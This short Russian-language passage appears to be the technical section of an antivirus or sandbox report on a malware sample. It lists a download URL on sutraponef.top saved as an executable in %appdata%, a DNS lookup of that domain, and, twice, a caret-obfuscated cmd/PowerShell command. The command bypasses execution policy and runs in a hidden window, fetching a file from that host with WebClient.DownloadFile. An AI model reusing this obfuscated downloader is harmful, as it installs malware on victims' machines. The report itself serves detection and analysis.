Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OwErSHElL.ExE ^-e^XeC^UtION^pol^I^cY^ ^BYpass^ ^-N^O^P^ROfile -^wi^nDOwS^TylE ^hIdd^En ^(^N^Ew-OBje^Ct^ systE^m^.NeT.WeBClI^eN^T).d^O^W^nLoAdFI^Le^(^'http://sutraponef.top/re...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /c "p^OwErSHElL.ExE ^-e^XeC^UtION^pol^I^cY^ ^BYpass^ ^-N^O^P^ROfile -^wi^nDOwS^TylE ^hIdd^En ^(^N^Ew-OBje^Ct^ systE^m^.NeT.WeBClI^eN^T).d^O^W^nLoAdFI^Le^(^'http://sutraponef.top/re...' (со скрытым окном)